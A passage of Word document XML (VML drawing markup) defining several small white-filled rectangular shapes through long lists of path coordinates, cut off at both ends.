2639,7652,2641,7652,2644,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7652,2646,7653,2646,7653,2646,7653,2646,7653,2646,7653,2646,7654,2646,7654,2646,7654,2646,7654,2646,7655,2646,7655,2646,7655,2646,7656,2646,7656,2646,7656,2646,7657,2646,7657,2646,7658,2646,7658,2646,7659,2646,7659,2646,7660,2646,7661,2646,7661,2646,7662,2646,7663,2646,7664,2646,7664,2646,7665,2646,7666,2646,7667,2646,7668,2646,7669,2646,7670,2646,7671,2646,7672,2646,7673,2646,7675,2646,7676,2646,7677,2646,7679,2646,7680,2646,7681,2646,7683,2646,7684,2646,7686,2646,7688,2646,7689,2646,7691,2646,7693,2646,7695,2646,7697,2646,7699,2646,7701,2646,7703,2646,7705,2646,7707,2646,7709,2646,7711,2646,7714,2646,7716,2646,7719,2646,7721,2646,7724,2646,7727,2646,7729,2646,7732,2646,7735,2646,7738,2646,7741,2646,7744,2646,7747,2646,7750,2646,7754,2646,7757,2646,7760,2646,7764,2646,7767,2646,7771,2646,7775,2646,7779,2646,7783,2646,7787,2646,7791,2646,7795,2646,7799,2646,7803,2646,7808,2646,7812,2646,7817,2646,7821,2646,7826,2646,7831,2646,7836,2646,7840,2646,7846,2646,7851,2646,7856,2646,7861,2646,7867,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2646,7872,2645,7872,2645,7872,2645,7872,2645,7872,2645,7872,2645,7872,2645,7872,2644,7872,2644,7872,2644,7872,2644,7872,2643,7872,2643,7872,2643,7872,2643,7872,2642,7872,2642,7872,2642,7872,2641,7872,2641,7872,2641,7872,2640,7872,2640,7872,2640,7872,2639,7872,2639,7872,2638,7872,2638,7872,2637,7872,2637,7872,2636,7872,2636,7872,2635,7872,2634,7872,2634,7872,2633,7872,2632,7872,2632,7872,2631,7872,2630,7872,2629,7872,2629,7872,2628,7872,2627,7872,2626,7872,2625,7872,2624,7872,2623,7872,2622,7872,2621,7872,2620,7872,2619,7872,2618,7872,2617,7872,2616,7872,2615,7872,2614,7872,2612,7872,2611,7872,2610,7872,2609,7872,2607,7872,2606,7872,2604,7872,2603,7872,2601,7872,2600,7872,2598,7872,2597,7872,2595,7872,2594,7872,2592,7872,2590,7872,2588,7872,2587,7872,2585,7872,2583,7872,2581,7872,2579,7872,2577,7872,2575,7872,2573,7872,2571,7872,2569,7872,2567,7872,2564,7872,2562,7872,2560,7872,2558,7872,2555,7872,2553,7872,2550,7872,2548,7872,2545,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7872,2543,7871,2543,7871,2543,7871,2543,7871,2543,7871,2543,7871,2543,7870,2543,7870,2543,7870,2543,7870,2543,7869,2543,7869,2543,7869,2543,7868,2543,7868,2543,7867,2543,7867,2543,7867,2543,7866,2543,7866,2543,7865,2543,7864,2543,7864,2543,7863,2543,7862,2543,7862,2543,7861,2543,7860,2543,7859,2543,7859,2543,7858,2543,7857,2543,7856,2543,7855,2543,7854,2543,7853,2543,7852,2543,7850,2543,7849,2543,7848,2543,7847,2543,7845,2543,7844,2543,7842,2543,7841,2543,7839,2543,7838,2543,7836,2543,7835,2543,7833,2543,7831,2543,7829,2543,7827,2543,7825,2543,7823,2543,7821,2543,7819,2543,7817,2543,7815,2543,7812,2543,7810,2543,7808,2543,7805,2543,7803,2543,7800,2543,7797,2543,7795,2543,7792,2543,7789,2543,7786,2543,7783,2543,7780,2543,7777,2543,7774,2543,7770,2543,7767,2543,7764,2543,7760,2543,7756,2543,7753,2543,7749,2543,7745,2543,7741,2543,7737,2543,7733,2543,7729,2543,7725,2543,7721,2543,7716,2543,7712,2543,7707,2543,7703,2543,7698,2543,7693,2543,7688,2543,7683,2543,7678,2543,7673,2543,7668,2543,7663,2543,7657,2543,7652e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:409.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,8190" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:8190;width:110;height:230" coordorigin="2110,8190" coordsize="110,230" path="m2128,8209l2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2128,8209,2129,8209,2129,8209,2129,8209,2129,8209,2129,8209,2129,8209,2129,8209,2129,8209,2130,8209,2130,8209,2130,8209,2130,8209,2131,8209,2131,8209,2131,8209,2131,8209,2132,8209,2132,8209,2132,8209,2133,8209,2133,8209,2133,8209,2134,8209,2134,8209,2134,8209,2135,8209,2135,8209,2136,8209,2136,8209,2137,8209,2137,8209,2138,8209,2138,8209,2139,8209,2140,8209,2140,8209,2141,8209,2142,8209,2142,8209,2143,8209,2144,8209,2145,8209,2145,8209,2146,8209,2147,8209,2148,8209,2149,8209,2150,8209,2151,8209,2152,8209,2153,8209,2154,8209,2155,8209,2156,8209,2157,8209,2158,8209,2159,8209,2160,8209,2162,8209,2163,8209,2164,8209,2165,8209,2167,8209,2168,8209,2170,8209,2171,8209,2173,8209,2174,8209,2176,8209,2177,8209,2179,8209,2180,8209,2182,8209,2184,8209,2186,8209,2187,8209,2189,8209,2191,8209,2193,8209,2195,8209,2197,8209,2199,8209,2201,8209,2203,8209,2205,8209,2207,8209,2210,8209,2212,8209,2214,8209,2216,8209,2219,8209,2221,8209,2224,8209,2226,8209,2229,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8209,2231,8210,2231,8210,2231,8210,2231,8210,2231,8210,2231,8210,2231,8210,2231,8210,2231,8210,2231,8210,2231,8211,2231,8211,2231,8211,2231,8211,2231,8211,2231,8212,2231,8212,2231,8212,2231,8213,2231,8213,2231,8213,2231,8214,2231,8214,2231,8214,2231,8215,2231,8215,2231,8216,2231,8217,2231,8217,2231,8218,2231,8218,2231,8219,2231,8220,2231,8220,2231,8221,2231,8222,2231,8223,2231,8224,2231,8225,2231,8226,2231,8227,2231,8228,2231,8229,2231,8230,2231,8231,2231,8232,2231,8234,2231,8235,2231,8236,2231,8238,2231,8239,2231,8241,2231,8242,2231,8244,2231,8245,2231,8247,2231,8249,2231,8250,2231,8252,2231,8254,2231,8256,2231,8258,2231,8260,2231,8262,2231,8265,2231,8267,2231,8269,2231,8271,2231,8274,2231,8276,2231,8279,2231,8281,2231,8284,2231,8287,2231,8290,2231,8293,2231,8295,2231,8298,2231,8302,2231,8305,2231,8308,2231,8311,2231,8315,2231,8318,2231,8321,2231,8325,2231,8329,2231,8332,2231,8336,2231,8340,2231,8344,2231,8348,2231,8352,2231,8356,2231,8361,2231,8365,2231,8370,2231,8374,2231,8379,2231,8383,2231,8388,2231,8393,2231,8398,2231,8403,2231,8408,2231,8414,2231,8419,2231,8424,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2231,8430,2230,8430,2230,8430,2230,8430,2230,8430,2230,8430,2230,8430,2230,8430,2229,8430,2229,8430,2229,8430,2229,8430,2229,8430,2228,8430,2228,8430,2228,8430,2227,8430,2227,8430,2227,8430,2227,8430,2226,8430,2226,8430,2225,8430,2225,8430,2225,8430,2224,8430,2224,8430,2223,8430,2223,8430,2222,8430,2222,8430,2221,8430,2221,8430,2220,8430,2219,8430,2219,8430,2218,8430,2217,8430,2217,8430,2216,8430,2215,8430,2214,8430,2214,8430,2213,8430,2212,8430,2211,8430,2210,8430,2209,8430,2208,8430,2207,8430,2206,8430,2205,8430,2204,8430,2203,8430,2202,8430,2201,8430,2200,8430,2199,8430,2197,8430,2196,8430,2195,8430,2194,8430,2192,8430,2191,8430,2189,8430,2188,8430,2187,8430,2185,8430,2183,8430,2182,8430,2180,8430,2179,8430,2177,8430,2175,8430,2173,8430,2172,8430,2170,8430,2168,8430,2166,8430,2164,8430,2162,8430,2160,8430,2158,8430,2156,8430,2154,8430,2152,8430,2149,8430,2147,8430,2145,8430,2143,8430,2140,8430,2138,8430,2135,8430,2133,8430,2130,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8430,2128,8429,2128,8429,2128,8429,2128,8429,2128,8429,2128,8429,2128,8429,2128,8429,2128,8429,2128,8428,2128,8428,2128,8428,2128,8428,2128,8427,2128,8427,2128,8427,2128,8427,2128,8426,2128,8426,2128,8425,2128,8425,2128,8425,2128,8424,2128,8424,2128,8423,2128,8423,2128,8422,2128,8421,2128,8421,2128,8420,2128,8419,2128,8419,2128,8418,2128,8417,2128,8416,2128,8415,2128,8414,2128,8413,2128,8412,2128,8411,2128,8410,2128,8409,2128,8408,2128,8407,2128,8406,2128,8404,2128,8403,2128,8402,2128,8400,2128,8399,2128,8397,2128,8395,2128,8394,2128,8392,2128,8390,2128,8389,2128,8387,2128,8385,2128,8383,2128,8381,2128,8379,2128,8377,2128,8375,2128,8372,2128,8370,2128,8368,2128,8365,2128,8363,2128,8360,2128,8358,2128,8355,2128,8352,2128,8349,2128,8347,2128,8344,2128,8341,2128,8338,2128,8334,2128,8331,2128,8328,2128,8325,2128,8321,2128,8318,2128,8314,2128,8310,2128,8307,2128,8303,2128,8299,2128,8295,2128,8291,2128,8287,2128,8283,2128,8278,2128,8274,2128,8270,2128,8265,2128,8260,2128,8256,2128,8251,2128,8246,2128,8241,2128,8236,2128,8231,2128,8226,2128,8220,2128,8215,2128,8209e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:409.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,8190" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:8190;width:110;height:230" coordorigin="2530,8190" coordsize="110,230" path="m2543,8209l2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2543,8209,2544,8209,2544,8209,2544,8209,2544,8209,2544,8209,2544,8209,2544,8209,2545,8209,2545,8209,2545,8209,2545,8209,2545,8209,2546,8209,2546,8209,2546,8209,2547,8209,2547,8209,2547,8209,2548,8209,2548,8209,2548,8209,2549,8209,2549,8209,2549,8209,2550,8209,2550,8209,2551,8209,2551,8209,2552,8209,2552,8209,2553,8209,2553,8209,2554,8209,2555,8209,2555,8209,2556,8209,2557,8209,2557,8209,2558,8209,2559,8209,2560,8209,2560,8209,2561,8209,2562,8209,2563,8209,2564,8209,2565,8209,2566,8209,2567,8209,2568,8209,2569,8209,2570,8209,2571,8209,2572,8209,2573,8209,2574,8209,2575,8209,2577,8209,2578,8209,2579,8209,2580,8209,2582,8209,2583,8209,2585,8209,2586,8209,2587,8209,2589,8209,2591,8209,2592,8209,2594,8209,2595,8209,2597,8209,2599,8209,2601,8209,2602,8209,2604,8209,2606,8209,2608,8209,2610,8209,2612,8209,2614,8209,2616,8209,2618,8209,2620,8209,2622,8209,2625,8209,2627,8209,2629,8209,2631,8209,2634,8209,2636,8209,2639,8209,2641,8209,2644,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8209,2646,8210,2646,8210,2646,8210,2646,8210,2646,8210,2646,8210,2646,8210,2646,8210,2646,8210,2646,8210,2646,8211,2646,8211,2646,8211,2646,8211,2646,8211,2646,8212,2646,8212,2646,8212,2646,8213,2646,8213,2646,8213,2646,8214,2646,8214,2646,8214,2646,8215,2646,8215,2646,8216,2646,8217,2646,8217,2646,8218,2646,8218,2646,8219,2646,8220,2646,8220,2646,8221,2646,8222,2646,8223,2646,8224,2646,8225,2646,8226,2646,8227,2646,8228,2646,8229,2646,8230,2646,8231,2646,8232,2646,8234,2646,8235,2646,8236,2646,8238,2646,8239,2646,8241,2646,8242,2646,8244,2646,8245,2646,8247,2646,8249,2646,8250,2646,8252,2646,8254,2646,8256,2646,8258,2646,8260,2646,8262,2646,8265,2646,8267,2646,8269,2646,8271,2646,8274,2646,8276,2646,8279,2646,8281,2646,8284,2646,8287,2646,8290,2646,8293,2646,8295,2646,8298,2646,8302,2646,8305,2646,8308,2646,8311,2646,8315,2646,8318,2646,8321,2646,8325,2646,8329,2646,8332,2646,8336,2646,8340,2646,8344,2646,8348,2646,8352,2646,8356,2646,8361,2646,8365,2646,8370,2646,8374,2646,8379,2646,8383,2646,8388,2646,8393,2646,8398,2646,8403,2646,8408,2646,8414,2646,8419,2646,8424,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2646,8430,2645,8430,2645,8430,2645,8430,2645,8430,2645,8430,2645,8430,2645,8430,2644,8430,2644,8430,2644,8430,2644,8430,2643,8430,2643,8430,2643,8430,2643,8430,2642,8430,2642,8430,2642,8430,2641,8430,2641,8430,2641,8430,2640,8430,2640,8430,2640,8430,2639,8430,2639,8430,2638,8430,2638,8430,2637,8430,2637,8430,2636,8430,2636,8430,2635,8430,2634,8430,2634,8430,2633,8430,2632,8430,2632,8430,2631,8430,2630,8430,2629,8430,2629,8430,2628,8430,2627,8430,2626,8430,2625,8430,2624,8430,2623,8430,2622,8430,2621,8430,2620,8430,2619,8430,2618,8430,2617,8430,2616,8430,2615,8430,2614,8430,2612,8430,2611,8430,2610,8430,2609,8430,2607,8430,2606,8430,2604,8430,2603,8430,2601,8430,2600,8430,2598,8430,2597,8430,2595,8430,2594,8430,2592,8430,2590,8430,2588,8430,2587,8430,2585,8430,2583,8430,2581,8430,2579,8430,2577,8430,2575,8430,2573,8430,2571,8430,2569,8430,2567,8430,2564,8430,2562,8430,2560,8430,2558,8430,2555,8430,2553,8430,2550,8430,2548,8430,2545,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8430,2543,8429,2543,8429,2543,8429,2543,8429,2543,8429,2543,8429,2543,8429,2543,8429,2543,8429,2543,8428,2543,8428,2543,8428,2543,8428,2543,8427,2543,8427,2543,8427,2543,8427,2543,8426,2543,8426,2543,8425,2543,8425,2543,8425,2543,8424,2543,8424,2543,8423,2543,8423,2543,8422,2543,8421,2543,8421,2543,8420,2543,8419,2543,8419,2543,8418,2543,8417,2543,8416,2543,8415,2543,8414,2543,8413,2543,8412,2543,8411,2543,8410,2543,8409,2543,8408,2543,8407,2543,8406,2543,8404,2543,8403,2543,8402,2543,8400,2543,8399,2543,8397,2543,8395,2543,8394,2543,8392,2543,8390,2543,8389,2543,8387,2543,8385,2543,8383,2543,8381,2543,8379,2543,8377,2543,8375,2543,8372,2543,8370,2543,8368,2543,8365,2543,8363,2543,8360,2543,8358,2543,8355,2543,8352,2543,8349,2543,8347,2543,8344,2543,8341,2543,8338,2543,8334,2543,8331,2543,8328,2543,8325,2543,8321,2543,8318,2543,8314,2543,8310,2543,8307,2543,8303,2543,8299,2543,8295,2543,8291,2543,8287,2543,8283,2543,8278,2543,8274,2543,8270,2543,8265,2543,8260,2543,8256,2543,8251,2543,8246,2543,8241,2543,8236,2543,8231,2543,8226,2543,8220,2543,8215,2543,8209e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:436.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,8730" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:8730;width:110;height:230" coordorigin="2110,8730" coordsize="110,230" path="m2128,8754l2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2128,8754,2129,8754,2129,8754,2129,8754,2129,8754,2129,8754,2129,8754,2129,8754,2129,8754,2130,8754,2130,8754,2130,8754,2130,8754,2131,8754,2131,8754,2131,8754,2131,8754,2132,8754,2132,8754,2132,8754,2133,8754,2133,8754,2133,8754,2134,8754,2134,8754,2134,8754,2135,8754,2135,8754,2136,8754,2136,8754,2137,8754,2137,8754,2138,8754,2138,8754,2139,8754,2140,8754,2140,8754,2141,8754,2142,8754,2142,8754,2143,8754,2144,8754,2145,8754,2145,8754,2146,8754,2147,8754,2148,8754,2149,8754,2150,8754,2151,8754,2152,8754,2153,8754,2154,8754,2155,8754,2156,8754,2157,8754,2158,8754,2159,8754,2160,8754,2162,8754,2163,8754,2164,8754,2165,8754,2167,8754,2168,8754,2170,8754,2171,8754,2173,8754,2174,8754,2176,8754,2177,8754,2179,8754,2180,8754,2182,8754,2184,8754,2186,8754,2187,8754,2189,8754,2191,8754,2193,8754,2195,8754,2197,8754,2199,8754,2201,8754,2203,8754,2205,8754,2207,8754,2210,8754,2212,8754,2214,8754,2216,8754,2219,8754,2221,8754,2224,8754,2226,8754,2229,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8754,2231,8755,2231,8755,2231,8755,2231,8755,2231,8755,2231,8755,2231,8756,2231,8756,2231,8756,2231,8756,2231,8757,2231,8757,2231,8757,2231,8757,2231,8758,2231,8758,2231,8759,2231,8759,2231,8760,2231,8760,2231,8761,2231,8761,2231,8762,2231,8762,2231,8763,2231,8764,2231,8764,2231,8765,2231,8766,2231,8767,2231,8768,2231,8768,2231,8769,2231,8770,2231,8771,2231,8772,2231,8773,2231,8775,2231,8776,2231,8777,2231,8778,2231,8779,2231,8781,2231,8782,2231,8784,2231,8785,2231,8787,2231,8788,2231,8790,2231,8792,2231,8793,2231,8795,2231,8797,2231,8799,2231,8801,2231,8803,2231,8805,2231,8807,2231,8809,2231,8811,2231,8814,2231,8816,2231,8818,2231,8821,2231,8823,2231,8826,2231,8829,2231,8831,2231,8834,2231,8837,2231,8840,2231,8843,2231,8846,2231,8849,2231,8853,2231,8856,2231,8859,2231,8863,2231,8866,2231,8870,2231,8873,2231,8877,2231,8881,2231,8885,2231,8889,2231,8893,2231,8897,2231,8901,2231,8905,2231,8910,2231,8914,2231,8919,2231,8923,2231,8928,2231,8933,2231,8938,2231,8943,2231,8948,2231,8953,2231,8958,2231,8963,2231,8969,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2231,8974,2230,8974,2230,8974,2230,8974,2230,8974,2230,8974,2230,8974,2230,8974,2229,8974,2229,8974,2229,8974,2229,8974,2229,8974,2228,8974,2228,8974,2228,8974,2227,8974,2227,8974,2227,8974,2227,8974,2226,8974,2226,8974,2225,8974,2225,8974,2225,8974,2224,8974,2224,8974,2223,8974,2223,8974,2222,8974,2222,8974,2221,8974,2221,8974,2220,8974,2219,8974,2219,8974,2218,8974,2217,8974,2217,8974,2216,8974,2215,8974,2214,8974,2214,8974,2213,8974,2212,8974,2211,8974,2210,8974,2209,8974,2208,8974,2207,8974,2206,8974,2205,8974,2204,8974,2203,8974,2202,8974,2201,8974,2200,8974,2199,8974,2197,8974,2196,8974,2195,8974,2194,8974,2192,8974,2191,8974,2189,8974,2188,8974,2187,8974,2185,8974,2183,8974,2182,8974,2180,8974,2179,8974,2177,8974,2175,8974,2173,8974,2172,8974,2170,8974,2168,8974,2166,8974,2164,8974,2162,8974,2160,8974,2158,8974,2156,8974,2154,8974,2152,8974,2149,8974,2147,8974,2145,8974,2143,8974,2140,8974,2138,8974,2135,8974,2133,8974,2130,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8974,2128,8973,2128,8973,2128,8973,2128,8973,2128,8973,2128,8972,2128,8972,2128,8972,2128,8972,2128,8971,2128,8971,2128,8971,2128,8970,2128,8970,2128,8969,2128,8969,2128,8968,2128,8968,2128,8967,2128,8967,2128,8966,2128,8965,2128,8965,2128,8964,2128,8963,2128,8962,2128,8962,2128,8961,2128,8960,2128,8959,2128,8958,2128,8957,2128,8956,2128,8955,2128,8954,2128,8953,2128,8951,2128,8950,2128,8949,2128,8948,2128,8946,2128,8945,2128,8943,2128,8942,2128,8940,2128,8938,2128,8937,2128,8935,2128,8933,2128,8931,2128,8930,2128,8928,2128,8926,2128,8924,2128,8921,2128,8919,2128,8917,2128,8915,2128,8912,2128,8910,2128,8907,2128,8905,2128,8902,2128,8900,2128,8897,2128,8894,2128,8891,2128,8888,2128,8885,2128,8882,2128,8879,2128,8876,2128,8873,2128,8869,2128,8866,2128,8862,2128,8859,2128,8855,2128,8851,2128,8847,2128,8844,2128,8840,2128,8836,2128,8831,2128,8827,2128,8823,2128,8819,2128,8814,2128,8810,2128,8805,2128,8800,2128,8795,2128,8791,2128,8786,2128,8781,2128,8775,2128,8770,2128,8765,2128,8759,2128,8754e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:436.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,8730" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:8730;width:110;height:230" coordorigin="2530,8730" coordsize="110,230" path="m2543,8754l2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2543,8754,2544,8754,2544,8754,2544,8754,2544,8754,2544,8754,2544,8754,2544,8754,2545,8754,2545,8754,2545,8754,2545,8754,2545,8754,2546,8754,2546,8754,2546,8754,2547,8754,2547,8754,2547,8754,2548,8754,2548,8754,2548,8754,2549,8754,2549,8754,2549,8754,2550,8754,2550,8754,2551,8754,2551,8754,2552,8754,2552,8754,2553,8754,2553,8754,2554,8754,2555,8754,2555,8754,2556,8754,2557,8754,2557,8754,2558,8754,2559,8754,2560,8754,2560,8754,2561,8754,2562,8754,2563,8754,2564,8754,2565,8754,2566,8754,2567,8754,2568,8754,2569,8754,2570,8754,2571,8754,2572,8754,2573,8754,2574,8754,2575,8754,2577,8754,2578,8754,2579,8754,2580,8754,2582,8754,2583,8754,2585,8754,2586,8754,2587,8754,2589,8754,2591,8754,2592,8754,2594,8754,2595,8754,2597,8754,2599,8754,2601,8754,2602,8754,2604,8754,2606,8754,2608,8754,2610,8754,2612,8754,2614,8754,2616,8754,2618,8754,2620,8754,2622,8754,2625,8754,2627,8754,2629,8754,2631,8754,2634,8754,2636,8754,2639,8754,2641,8754,2644,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8754,2646,8755,2646,8755,2646,8755,2646,8755,2646,8755,2646,8755,2646,8756,2646,8756,2646,8756,2646,8756,2646,8757,2646,8757,2646,8757,2646,8757,2646,8758,2646,8758,2646,8759,2646,8759,2646,8760,2646,8760,2646,8761,2646,8761,2646,8762,2646,8762,2646,8763,2646,8764,2646,8764,2646,8765,2646,8766,2646,8767,2646,8768,2646,8768,2646,8769,2646,8770,2646,8771,2646,8772,2646,8773,2646,8775,2646,8776,2646,8777,2646,8778,2646,8779,2646,8781,2646,8782,2646,8784,2646,8785,2646,8787,2646,8788,2646,8790,2646,8792,2646,8793,2646,8795,2646,8797,2646,8799,2646,8801,2646,8803,2646,8805,2646,8807,2646,8809,2646,8811,2646,8814,2646,8816,2646,8818,2646,8821,2646,8823,2646,8826,2646,8829,2646,8831,2646,8834,2646,8837,2646,8840,2646,8843,2646,8846,2646,8849,2646,8853,2646,8856,2646,8859,2646,8863,2646,8866,2646,8870,2646,8873,2646,8877,2646,8881,2646,8885,2646,8889,2646,8893,2646,8897,2646,8901,2646,8905,2646,8910,2646,8914,2646,8919,2646,8923,2646,8928,2646,8933,2646,8938,2646,8943,2646,8948,2646,8953,2646,8958,2646,8963,2646,8969,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2646,8974,2645,8974,2645,8974,2645,8974,2645,8974,2645,8974,2645,8974,2645,8974,2644,8974,2644,8974,2644,8974,2644,8974,2643,8974,2643,8974,2643,8974,2643,8974,2642,8974,2642,8974,2642,8974,2641,8974,2641,8974,2641,8974,2640,8974,2640,8974,2640,8974,2639,8974,2639,8974,2638,8974,2638,8974,2637,8974,2637,8974,2636,8974,2636,8974,2635,8974,2634,8974,2634,8974,2633,8974,2632,8974,2632,8974,2631,8974,2630,8974,2629,8974,2629,8974,2628,8974,2627,8974,2626,8974,2625,8974,2624,8974,2623,8974,2622,8974,2621,8974,2620,8974,2619,8974,2618,8974,2617,8974,2616,8974,2615,8974,2614,8974,2612,8974,2611,8974,2610,8974,2609,8974,2607,8974,2606,8974,2604,8974,2603,8974,2601,8974,2600,8974,2598,8974,2597,8974,2595,8974,2594,8974,2592,8974,2590,8974,2588,8974,2587,8974,2585,8974,2583,8974,2581,8974,2579,8974,2577,8974,2575,8974,2573,8974,2571,8974,2569,8974,2567,8974,2564,8974,2562,8974,2560,8974,2558,8974,2555,8974,2553,8974,2550,8974,2548,8974,2545,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8974,2543,8973,2543,8973,2543,8973,2543,8973,2543,8973,2543,8972,2543,8972,2543,8972,2543,8972,2543,8971,2543,8971,2543,8971,2543,8970,2543,8970,2543,8969,2543,8969,2543,8968,2543,8968,2543,8967,2543,8967,2543,8966,2543,8965,2543,8965,2543,8964,2543,8963,2543,8962,2543,8962,2543,8961,2543,8960,2543,8959,2543,8958,2543,8957,2543,8956,2543,8955,2543,8954,2543,8953,2543,8951,2543,8950,2543,8949,2543,8948,2543,8946,2543,8945,2543,8943,2543,8942,2543,8940,2543,8938,2543,8937,2543,8935,2543,8933,2543,8931,2543,8930,2543,8928,2543,8926,2543,8924,2543,8921,2543,8919,2543,8917,2543,8915,2543,8912,2543,8910,2543,8907,2543,8905,2543,8902,2543,8900,2543,8897,2543,8894,2543,8891,2543,8888,2543,8885,2543,8882,2543,8879,2543,8876,2543,8873,2543,8869,2543,8866,2543,8862,2543,8859,2543,8855,2543,8851,2543,8847,2543,8844,2543,8840,2543,8836,2543,8831,2543,8827,2543,8823,2543,8819,2543,8814,2543,8810,2543,8805,2543,8800,2543,8795,2543,8791,2543,8786,2543,8781,2543,8775,2543,8770,2543,8765,2543,8759,2543,8754e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:464.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,9290" coordsize="110,230">
